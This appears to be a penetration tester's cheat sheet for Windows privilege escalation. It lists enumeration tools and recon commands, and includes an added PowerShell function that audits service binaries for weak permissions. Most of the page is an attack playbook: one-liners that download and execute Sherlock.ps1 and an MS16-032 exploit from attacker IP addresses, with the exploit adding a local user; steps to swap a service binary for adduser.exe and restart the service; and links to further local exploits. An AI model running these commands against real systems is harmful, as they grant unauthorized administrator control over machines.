### 1. Information gathering suggester
#### Automated information-gathering tools
Listed in no particular order of preference.
- beRoot.exe [beRoot.exe](https://github.com/AlessandroZ/BeRoot/releases)
- windows-exploit-suggester.py
```
windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
```
- SharpUp.exe [SharpUp.exe](https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/SharpUp.exe)
- schcheck.bat [schcheck.bat](https://raw.githubusercontent.com/ankh2054/windows-pentest/master/schcheck.bat)
- PrivescCheck.ps1 [PrivescCheck.ps1](https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1)
- PowerUp.ps1 [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1)
```
Invoke-AllChecks
```
- Seatbelt.exe [Seatbelt.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Seatbelt.exe)
- SharpUp.exe [SharpUp.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe)
- winpeas [winpeas](https://github.com/carlospolop/PEASS-ng/releases/download/20220515/winPEASany.exe)
- Sherlock.ps1 [Sherlock.ps1](https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1)
```
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/Sherlock.ps1') ; Find-AllVulns"
```
#### Online quick references
[Windows privilege-escalation helper page](https://i.hacking8.com/tiquan/)
[LOLBAS](https://lolbas-project.github.io/#)
### Manual information gathering
```
systeminfo
whoami /all
net localgroup administrators
powershell -c Get-Service
```
#### Scheduled tasks
```
schtasks /query /fo LIST /v
:: full paths of the binaries, in case they are not found via PATH
C:\windows\SysWOW64\systeminfo.exe
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
```
#### Usbpcap
```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
```
If USBPcap is installed, CVE-2017-6178 (USBPcap privilege escalation) may apply.
```
dir "C:\Program Files" | findstr /i usbpcap
driverquery /v | findstr /i usbpcap
```
It may also be in this directory:
```
dir C:\Windows\System32\DRIVERS | findstr /i usbpcap
```
#### Service privilege escalation
```
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
```
```
icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
:: optionally, with Sysinternals accesschk:
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Power Users" *
accesschk.exe /accepteula -uwcqv "Users" *
accesschk.exe /accepteula -uwdqs "Users" c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
accesschk.exe /accepteula -uwqs "Users" "c:\Program Files"
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
```
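The icacls / accesschk checks above, gathered into one PowerShell audit function. This is an added example, not code from the original page or from any of the tools it lists: it resolves each service's binary from its `PathName` (both quoted and unquoted forms, so paths under `C:\Program Files` with spaces are handled), reads the file ACL and reports any service whose binary grants write rights to a low-privilege principal. The principal list (`Everyone`, `BUILTIN\Users`, `Authenticated Users`, `INTERACTIVE`) is an assumption; adjust it to the groups in use. Running it as the unprivileged account you are assessing shows exactly what that account could overwrite.

```powershell
# Added example (not from the original page or any listed tool): find service
# binaries writable by low-privilege principals, i.e. what the icacls /
# accesschk -uwcqv checks report, as a reusable audit function.

function Get-ServiceBinaryPath {
    param([string]$PathName)
    if (-not $PathName) { return $null }
    # Quoted form: "C:\Program Files\X\x.exe" /args  -> text inside the quotes
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted form: C:\Program Files\X\x.exe /args -> shortest prefix ending in .exe
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)') { return $Matches[1] }
    return $PathName.Trim()
}

function Test-WeakServiceBinaryAcl {
    param(
        # Assumed list of low-privilege principals; extend for site-specific groups.
        [string[]]$LowPrivPrincipals = @(
            'Everyone', 'BUILTIN\Users',
            'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    )
    # Any of these rights lets the principal change the executable's contents.
    $writeMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                       [System.Security.AccessControl.FileSystemRights]::WriteData -bor
                       [System.Security.AccessControl.FileSystemRights]::Modify -bor
                       [System.Security.AccessControl.FileSystemRights]::FullControl)

    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        $bin = Get-ServiceBinaryPath $svc.PathName
        if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { return }
        $acl = Get-Acl -LiteralPath $bin
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode   # Auto vs Manual matters for the restart step below
                RunsAs    = $svc.StartName   # LocalSystem here means a full escalation path
                Binary    = $bin
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

# Usage: list every weak service binary with the account that owns the service.
Test-WeakServiceBinaryAcl | Format-Table -AutoSize
```

The `StartMode` and `RunsAs` columns carry the two facts the rest of this section depends on: whether the service can be restarted by a normal user (Manual) or only by a reboot (Auto), and whether the service runs as `LocalSystem`. For hardening, the fix is to remove write rights for those principals on the binary and its directory (`icacls <file> /remove:g Users`), then re-run the function until it returns nothing.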
```
:: replace the original binary
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
```
##### Restart the service
```
net stop service-name
sc qc regsvc
:: check the start mode: if it is Auto, the service only runs again after a reboot;
:: if it is Manual, check whether it can simply be restarted by hand
wmic service where caption="Serviio" get name, caption, state, startmode
net start service-name
```
### WMIC
```
:: batch-file syntax (%%A); use %A instead when typing the loop interactively in cmd
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
```
### powershell
```powershell
# refs:
# https://github.com/nekocode/win_penetration
# https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1
Powershell.exe Start-Process cmd.exe -Verb runAs "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Get-ExecutionPolicy
Set-ExecutionPolicy RemoteSigned
```
### runas
```
runas /user:admin cmd.exe
```
```powershell
# MS16-032
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.17.223:8000/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"
```
```bash
# powershell.exe locations on different Windows builds
C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
```
### Windows Installer privilege escalation
- [InstallerFileTakeOver](https://github.com/klinix5/InstallerFileTakeOver) (e.g. Windows 10, Windows 11, Windows Server 2022)
### x86
- [exploit-db 40564](https://www.exploit-db.com/exploits/40564) (2008 R2)
### Fix PATH
```bash
set PATH=%SystemRoot%\system32;%SystemRoot%;
```